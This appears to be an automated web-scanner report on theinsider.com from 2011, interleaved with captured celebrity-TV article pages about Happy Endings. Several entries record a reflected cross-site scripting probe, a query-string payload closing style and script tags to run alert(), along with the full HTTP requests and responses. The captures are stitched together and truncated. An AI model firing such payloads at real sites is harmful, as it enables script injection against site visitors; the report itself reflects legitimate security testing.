href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div><!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div></div><div class="clearfix"></div><!-- END HEADER --><!-- MAIN CONTENT --><script src="/lib/jqmodal.js" type="text/javascript"></script><!-- BELOW: The Insider article.mc --><style>.jqmClose { background: url("/media/img/btn_close3.png") no-repeat scroll 0 0 transparent; display: block; height: 30px; float:right; position: relative; top: -10px; width: 30px;}.jqmWindow { background-color: transparent !important; color: #000000; display: none; left: 45%; margin-left: -410px; position: fixed; top: 5%; width: 800px;}.jqmOverlay { background-color: #000; position:fixed !important;}* html .jqmWindow { position: absolute; width: 700px;}.clear { clear: both;}.hidden { display: none;}.hideme { display: none;}.hide { display: none;}.hide_spot { visibility: hidden;}</style><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/screen/screen.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/screen'><img src='/media/img/channel_page_name_screen.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"><img src='/media/photo/2011/10/90576/happy_340_abc.jpg' alt='' /><p class='photo_copyright'>Richard Foreman / ABC</p></div><p class='article'><h3>First Look: 'Happy' Halloween</h3><div class='contrib_cont'><div class='contrib_container'><img src='/media/contributor/bio_pic_jarrett_wieselman.jpg' style='float:left; margin-right: 5px; display:block;'><div class='byline contrib_by'>BY:</div><p class='byline' style='margin-bottom: 0px;'><div class='contrib_border'><div style='width: 100px; font-size: 12px; display: block; margin-top:8px;'>Jarett Wieselman</div><a style='position:left; font-size: 12px; margin-right: 5px; position: relative; top: 2px;' href='http://www.twitter.com/@JarettSays'>@JarettSays</a></div><img src='/media/contributor/tiwtter_post_sm.jpg' style='margin-left:5px; position: relative; top: 5px;'><p class='contrib_date1' style='margin:5px 10px; font-weight: bold;'>October 07, 2011</p><div class='clearfix'></div></div></div><p>When asked about her character's Halloween costume for the October 26 episode of <em>Happy Endings</em>, actress Eliza Coupe <a href="http://blog.zap2it.com/frominsidethebox/2011/10/happy-endings-star-eliza-coupe-talks-about-janes-egg-daughter-mysterious-halloween-costume.html" target="_blank">told Zap2It</a>, &quot;Buckle up for that outfit!&quot;</p><p>And as you can see in this Insider.com exclusive first look, Jane looks more delicious than ever.</p><p>In the episode, titled <em>Spooky Endings</em>, Jane and Brad find themselves house sitting in the suburbs (more egg babies?!?) but she decides that isn't enough of a reason to skimp on the celebration! &quot;We do not see my body. We just see my face for the entire episode,&quot; Eliza teases of the brilliant bacon creation.</p><p><strong><a href="http://www.theinsider.com/screen/44617_Casey_Wilson_talks_Happy_Endings_season_Two/index.html" target="_blank">MORE: Casey Wilson Teases Her Musical Moment
</a></strong></p><p>But I don't want to put the cart before the horse. Or pig. Next Wednesday's <em>Happy Endings</em> also promises a yummy surprise as Megan Mullally guest stars, playing Penny's music-loving mama, Dana. And you just know she brings the (yes) <em>draaaaaaaaaaama</em>!</p><p><em>Happy Endings</em> airs Wednesdays at 9:30 p.m. on ABC.</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/tv/44947_Happy_Endings_Halloween_episode/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href='http://www.twitter.com/home?status=First+Look:+Happy+Halloween+http://insdr.co/qCJRH2+via+@theinsider' class='twitter-share-button'><img src='/media/img/tweet_png.png' class='video-sm-icons_' style='margin-bottom:-3px'/></a> <!--<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>--> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/tv/44947_Happy_Endings_Halloween_episode/index.html' num_posts='4' width='660'></fb:comments> </div> <div class="clearfix"></div> <!-- END FB COMMENTING --> <div id="outbrain_suggestions_wide"><img src="/media/img/outbrainheader.gif" alt="" /><script type="text/JavaScript">var OB_permalink= 'http://www.theinsider.com';var OB_Template="insider";var OB_widgetId= 'AR_1';var OB_langJS ='http://widgets.outbrain.com/lang_en.js';if ( typeof(OB_Script)!='undefined' )OutbrainStart();else{var OB_Script = true;var str = "<script src='http://widgets.outbrain.com/outbrainWidget.js'; type='text/javascript'></"+"script>";document.write(str);}</script></div> <div class="clearfix"></div></div> <div class="article-more-news"> <h3>MORE NEWS</h3><div class="article-more-news-box"><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html"><img src="/media/photo/2011/10/93494/mute_112.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-more-news-headline">Now You Know: MUTEMATH</a></h5>&..
- /screen/43693_Happy_Endings_Cast_Talks_Season_Two/

/screen/43693_Happy_Endings_Cast_Talks_Season_Two/

http://www.theinsider.com/screen/43693_Happy_Endings_Cast_Talks_Season_Two/?'%22--%3E%3C/style%3E%3C..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00331B)</script>

Request

GET /screen/43693_Happy_Endings_Cast_Talks_Season_Two/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/screen/43693_Happy_Endings_Cast_Talks_Season_Two/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=299
Date: Tue, 06 Dec 2011 07:12:35 GMT
Content-Length: 14165
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Happy Endings Cast Talks Season Two - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="Adam Pally, Elisha Cuthbert
, fall tv, Happy Endings, screen" /> <meta name="category" content="screen" /> <meta name="date" content="2011-08-24 10:33:00" /><meta property="og:title" content="Happy Endings Cast Talks Season Two" /><meta property="og:description" content="For a select group, Happy Endings was like a dirty little secret -- an under-the-radar slice of brilliance that spawned more inappropriate comments than a drunken family dinner. The good news is that this brilliantly absurd series got picked up for a second season. But the better news is that tonight delivers a brand new, never-before-seen episode!" /><meta property="og:url" content="http://www.theinsider.com/screen/43693_Happy_Endings_Cast_Talks_Season_Two/"/><meta property="og:type" content="article" /><meta property="og:image" content="http://www.theinsider.com/media/video/related_thumbs/43693/fbshare.png" /><meta property="og:video" content="http://www.theinsider.com/media/flash/coincident/CTVWebPlayerS.swf?media=/screen/43693_Happy_Endings_Cast_Talks_Season_Two/fb_related.ctv" /><meta property="og:video:width" content="398" /><meta property="og:video:height" content="305" /><meta property="og:video:type" content="application/x-shockwave-flash" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-08-24 10:33:00" /><Attribute name="sdate" value="20110824" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/video/related_thumbs/43693/fbshare.png" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script type="text/javascript" src="/swfobject.js"></script> <script src="/new_insider/jcapslide.js" type="text/javascript"></script> <link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <style> .ins_fb_text { display: block; left: 2px; position: absolute; top: 42px; } .ad_center { margin: 0 auto; width: 728px; } </style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/screen_video;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/screen_video;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/screen_video;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --><div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> <div id="top_searches"> <p>TOP SEARCHES: </p><script language="javascript"> function searchPost(term) { document.forms["cse-search-box"].elements[0].value = term; document.forms["cse-search-box"].submit(); return true; }</script> <div class='searchterms'></div> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div><!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div></div><div class="clearfix"></div><!-- END HEADER --><!-- MAIN CONTENT --><!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/screen/screen.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/screen'><img src='/media/img/channel_page_name_screen.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"> <img src='/media/img/video_unavailable.jpg'> </div><p class='article'><h3>'Happy Endings' Cast Teases Lost Episode</h3><div class='contrib_cont'><div class='contrib_container'><img src='/media/contributor/bio_pic_jarrett_wieselman.jpg' style='float:left; margin-right: 5px; display:block;'><div class='byline contrib_by'>BY:</div><p class='byline' style='margin-bottom: 0px;'><div class='contrib_border'><div style='width: 100px; font-size: 12px; display: block; margin-top:8px;'>Jarett Wieselman</div><a style='position:left; font-size: 12px; margin-right: 5px; position: relative; top: 2px;' href='http://www.twitter.com/@JarettSays'>@JarettSays</a></div><img src='/media/contributor/tiwtter_post_sm.jpg' style='margin-left:5px; position: relative; top: 5px;'><p class='contrib_date1' style='margin:5px 10px; font-weight: bold;'>August 24, 2011</p><div class='clearfix'></div></div></div><p>
For a select group, <em>Happy Endings</em> was like a dirty little secret -- an under-the-radar slice of brilliance that spawned more inappropriate comments than a drunken family dinner. The good news is that this brilliantly absurd series got picked up for a second season. But the better news is that tonight delivers a brand new, never-before-seen episode!




</p><p>
Titled, <em>Why Can't You Read Me</em>, the episode revolves around ... well, why don't I let the cast explain it. &quot;Penny gets an assistant,&quot; Adam Pally (who plays Max) tells TheInsider.com. &quot;She wants to be the cool boss but at the same time, she keeps pocket dialing Max and I become obsessed with listening to her.&quot;




</p><p>
Elsewhere, Dave's dating life comes into focus. Literally. &quot;Dave makes a sex tape,&quot; Elisha Cuthbert (who plays Alex) laughs. &quot;But, just as you would expect, it doesn't go well.&quot; Further illuminating why his bang is such a bust, Zachary Knighton (who plays Dave) tells me, &quot;The sex tape is with a women’s lacrosse coach. There are no sticks involved but there is a lot of game video.&quot;




</p><p>
<em>Happy Endings </em>was very much on the bubble of renewal, so getting the second season pickup was quite a relief to the cast. Especially Zachary, who finally broke a longstanding streak. &quot;I've never been on a show that's gotten a second season before, so I was super stressed the day we were going to find out, but now I’m feeling pretty good.&quot; As is Elisha, who has learned to embrace her funny bone thanks to the series. &quot;I love, love, love the physical comedy. I love having rib sauce all over my face,&quot; she tells me. &quot;I put it out into the universe that I wanted to do comedy, but I can't believe how lucky I got. I am learning every moment of every day from this cast.&quot;




</p><p>
And now that they're a little more comfortable with the place on the network schedule, the cast and crew plans to go balls to the walls in season two. &quot;As bold and outrageous as the show was in season one, there was a sense of kid gloves,&quot; Adam tells Insider.com. &quot;They didn’t know if the public was ready for characters like these, but now that everyone has seen that they are, I can’t wait to turn up the volume even further. Especially with Max!&quot;




</p><p>
<em>Happy Endings</em> airs Wednesdays at 9:30 p.m. on ABC.




</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/screen/43693_Happy_Endings_Cast_Talks_Season_Two/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href='http://www.twitter.com/home?status=Happy+Endings+Cast+Talks+Season+Two+http://theinsider.com/p/?3hzpdh+via+@theinsider' class='twitter-share-button'><img src='/media/img/tweet_png.png' class='video-sm-icons_' style='margin-bottom:-3px'/></a> <!--<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>--> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/screen/43693_Happy_Endings_Cast_Talks_..
- /screen/43693_Happy_Endings_Cast_Talks_Season_Two/index.html

/screen/43693_Happy_Endings_Cast_Talks_Season_Two/index.html

http://www.theinsider.com/screen/43693_Happy_Endings_Cast_Talks_Season_Two/index.html?'%22--%3E%3C/s..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x003333)</script>

Request

GET /screen/43693_Happy_Endings_Cast_Talks_Season_Two/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/tv/46994_Happy_Endings_Christmas_episode_clip/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:12:37 GMT
Content-Length: 14164
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Happy Endings Cast Talks Season Two - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="Adam Pally, Elisha Cuthbert
, fall tv, Happy Endings, screen" /> <meta name="category" content="screen" /> <meta name="date" content="2011-08-24 10:33:00" /><meta property="og:title" content="Happy Endings Cast Talks Season Two" /><meta property="og:description" content="For a select group, Happy Endings was like a dirty little secret -- an under-the-radar slice of brilliance that spawned more inappropriate comments than a drunken family dinner. The good news is that this brilliantly absurd series got picked up for a second season. But the better news is that tonight delivers a brand new, never-before-seen episode!" /><meta property="og:url" content="http://www.theinsider.com/screen/43693_Happy_Endings_Cast_Talks_Season_Two/"/><meta property="og:type" content="article" /><meta property="og:image" content="http://www.theinsider.com/media/video/related_thumbs/43693/fbshare.png" /><meta property="og:video" content="http://www.theinsider.com/media/flash/coincident/CTVWebPlayerS.swf?media=/screen/43693_Happy_Endings_Cast_Talks_Season_Two/fb_related.ctv" /><meta property="og:video:width" content="398" /><meta property="og:video:height" content="305" /><meta property="og:video:type" content="application/x-shockwave-flash" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-08-24 10:33:00" /><Attribute name="sdate" value="20110824" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/video/related_thumbs/43693/fbshare.png" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script type="text/javascript" src="/swfobject.js"></script> <script src="/new_insider/jcapslide.js" type="text/javascript"></script> <link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <style> .ins_fb_text { display: block; left: 2px; position: absolute; top: 42px; } .ad_center { margin: 0 auto; width: 728px; } </style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/screen_video;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/screen_video;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/screen_video;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --><div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> <div id="top_searches"> <p>TOP SEARCHES: </p><script language="javascript"> function searchPost(term) { document.forms["cse-search-box"].elements[0].value = term; document.forms["cse-search-box"].submit(); return true; }</script> <div class='searchterms'></div> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The 